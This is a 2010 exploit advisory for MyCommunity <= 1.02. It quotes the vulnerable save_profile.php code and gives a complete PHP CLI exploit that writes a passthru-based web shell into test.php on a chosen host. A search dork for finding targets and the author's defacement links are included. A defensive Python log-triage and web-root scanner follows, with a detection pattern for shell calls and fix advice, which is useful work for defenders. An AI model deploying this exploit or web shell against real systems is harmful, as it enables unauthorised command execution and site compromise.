
MyCommunity <= V1.02 Remote Code Execution

Posted on 23 June 2010

==========================================
MyCommunity <= V1.02 Remote Code Execution
==========================================

Name:          MyCommunity <= V1.02 Remote Code Execution
Software:      MyCommunity <= V1.02
Site:          http://articstudios.net/download.php
Download:      http://articstudios.net/mycommunityscript/files/MyCommunity%201.0.2.rar
Vulnerability: Remote Code Execution
Severity:      high ( low / medium / high )
Tested on:     1.02
Dork:          'The script is made by "Artic Studios"'

Author:   Lord-Anubis
Contact:  lord.anu bis4[at]gm ail[dot]com
Date:     23.06.2010 ( dd.mm.yyyy )
Site:     http://lordanubis.altervista.org/
Defaces:  http://www.zone-h.org/archive/notifier=Lord-Anubis
Exploits: http://inj3ct0r.com/author/2486

Bug File: save_profile.php

     3. if ( isset( $_POST ) )
     4.     $postArray = &$_POST ;            // 4.1.0 or later, use $_POST
     5. else
     6.     $postArray = &$HTTP_POST_VARS ;   // prior to 4.1.0, use HTTP_POST_VARS
     7.
     8. foreach ( $postArray as $sForm => $value )
     9. {
    10.     $postedValue = htmlspecialchars( stripslashes( $value ) ) ;
    11.     $writeValue = stripslashes( $value ) ;
    12.
    13.     // Open the file for truncated writing
    14.     $fp = @fopen("test.php", "w") or die("Couldn't open file for writing!"); // change mypage.html to point to the file you want to edit
    15.     $numBytes = @fwrite($fp, $writeValue) or die("Couldn't write html to file!");

Bug Explanation:

- EN: The file save_profile.php allows a page called test.php to be created without any check on the origin of the
  POST data; it even runs stripslashes on the strings. It is therefore possible to create any page with any content.

- ITA: The file save_profile.php allows the creation of a page called test.php without performing any check on the
  origin of the POST data; it even applies stripslashes to the strings. It will thus be possible to create any page
  with any content of our choosing.

- PL: ...

Exploit:

    <?php
    /**
     * exploit.php
     *
     * Software:      MyCommunity <= V1.02
     * Author:        Lord-Anubis <lord.anu bis4[at]gm ail[dot]com>
     * Vulnerability: Remote Code Execution
     */
    //
    error_reporting(0);
    ini_set("max_execution_time", 0);
    ini_set("default_socket_timeout", 5);
    //
    function sendPacket($packet)
    {
        global $hostName;
        if (!$sock = fsockopen(gethostbyname($hostName), 80)) {
            exit("[-] No response from '{$hostName}' ");
        }
        fputs($sock, $packet);
        while (!feof($sock)) {
            $html .= fgets($sock);
        }
        fclose($sock);
        return $html;
    }
    //
    //
    function phpCode()
    {
        return "<?php ob_end_clean();ob_clean();passthru($_GET['cmd']);die('Lord-Anubis');?>";
    }
    //
    if (php_sapi_name() !== 'cli') {
        exit(
            "<html><head><title>Attention!</title></head> ".
            "<body><br /><br /><center> ".
            "<h1>Error!</h1> ".
            "This exploit is meant to be used as php CLI script!<br /> ".
            "More information:<br /> ".
            "<a href="http://www.google.com/search?hl=en&q=php+cli+windows" target="_blank">http://www.google.com/search?hl=en&q=php+cli+windows</a><br /> ".
            "This script will not run through a webserver.<br /> ".
            "</center></body></html> "
        );
    }
    //
    if ($argc != 3) {
        exit(
            "[+] Software: MyCommunity <= V1.01 ".
            "[+] Author: Lord-Anubis ".
            "[+] Vulnerability: Remote Code Execution ".
            "[+] Usage: ./exploit [hostName] [path] ".
            "[+] Example: ".
            "[+] ./exploit 127.0.0.1 / ".
            "[+] ./exploit hostname.com /upload/ "
        );
    }
    //
    list($cli, $hostName, $path) = $argv;
    //
    $getUrl = parse_url($hostName);
    $hostName = $getUrl["path"];
    if (substr($hostName, 0, 4) == 'www.') {
        $hostName = substr($hostName, 3);
    }
    //
    if (substr($path, 0, 1) != "/") {
        $path = "/$path";
    }
    if (substr($path, -1) != "/") {
        $path = "$path/";
    }
    //
    $postData = "post=".phpCode();
    $packet  = "POST http://{$hostName}{$path}save_profile.php HTTP/1.1 ";
    $packet .= "Content-Type: application/x-www-form-urlencoded ";
    $packet .= "Host: {$hostName} ";
    $packet .= "Content-Length: ".strlen($postData)." ";
    $packet .= "Referer: http://{$hostName}{$path} ";
    $packet .= $postData;
    $return = sendPacket($packet);
    //
    if (!preg_match('/Lord-Anubis/is', $return)) {
        exit("[-] Exploit failed ");
    }
    //
    echo("[+] http://{$hostName}{$path}test.php ");
    echo("[+] Exploit successfull ");
    exit;
    ?>

# Inj3ct0r.com [2010-06-23]
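The advisory above gives a defender two concrete things to look for: a POST to save_profile.php (the handler writes the raw request body into test.php) and a follow-up GET of test.php with a cmd parameter from the same client, plus the dropped test.php itself in the document root. The following triage helper is an added example and is not code from the advisory or from the MyCommunity project. It assumes web-server access logs in the common Apache/nginx "combined" layout; the log lines and the IP addresses (documentation ranges) are constructed for the example.

```python
import os
import re
from collections import defaultdict

# Matches the common Apache/nginx "combined" access-log layout (assumption:
# logs use that layout). Sample lines further down are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)

# Shell-capable PHP calls; a file named test.php in the web root that
# contains one of these is the artifact the advisory's request leaves behind.
SHELL_CALLS = re.compile(r'\b(passthru|system|shell_exec|exec|popen)\s*\(', re.I)


def parse_line(line):
    """Split one access-log line into ip, method, path, query and status."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"], _, rec["query"] = rec["url"].partition("?")
    return rec


def triage_log(lines):
    """Return (severity, ip, detail) findings for the save_profile.php pattern.

    A POST to save_profile.php is suspicious on its own, because the handler
    writes the unvalidated body to test.php. The same client then fetching
    test.php with a cmd parameter in the same directory is the full chain.
    """
    findings = []
    posted_dirs = defaultdict(set)  # ip -> directories where save_profile.php was POSTed
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        directory, _, name = rec["path"].rpartition("/")
        if rec["method"] == "POST" and name == "save_profile.php":
            posted_dirs[rec["ip"]].add(directory)
            findings.append(("medium", rec["ip"], f"POST {rec['path']}: unvalidated write to test.php"))
        elif name == "test.php":
            has_cmd = re.search(r"(^|&)cmd=", rec["query"]) is not None
            if has_cmd and directory in posted_dirs[rec["ip"]]:
                findings.append(("high", rec["ip"], f"GET {rec['path']}?cmd= after save_profile.php POST"))
            elif has_cmd:
                findings.append(("medium", rec["ip"], f"GET {rec['path']} with cmd parameter"))
            else:
                findings.append(("low", rec["ip"], f"GET {rec['path']} (file is not part of a clean install)"))
    return findings


def suspicious_php_file(name, content):
    """True when a file looks like the dropped test.php: that name plus a shell call."""
    return name == "test.php" and "<?php" in content and SHELL_CALLS.search(content) is not None


def scan_webroot(root):
    """Walk a document root and return paths of files matching suspicious_php_file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    content = fh.read(65536)
            except OSError:
                continue
            if suspicious_php_file(fname, content):
                hits.append(full)
    return hits


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jun/2010:10:00:01 +0200] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/Jun/2010:10:00:02 +0200] "POST /save_profile.php HTTP/1.1" 200 312',
    '203.0.113.7 - - [23/Jun/2010:10:00:03 +0200] "GET /test.php?cmd=id HTTP/1.1" 200 64',
    '198.51.100.9 - - [23/Jun/2010:10:05:00 +0200] "GET /forum/test.php HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for sev, ip, detail in triage_log(SAMPLE_LOG):
        print(f"[{sev}] {ip}: {detail}")
```

Run it against a real log by replacing SAMPLE_LOG with the file's lines, and run scan_webroot on the document root to confirm whether test.php was actually written; a 404 on test.php (as in the last sample line) is a probe that did not succeed, while a 200 after a POST to save_profile.php means the file exists and the install should be treated as compromised. The correct fix on the application side is to stop writing request data to a file inside the web root at all; if profile data must be persisted, keep it outside the document root under a fixed, non-executable name.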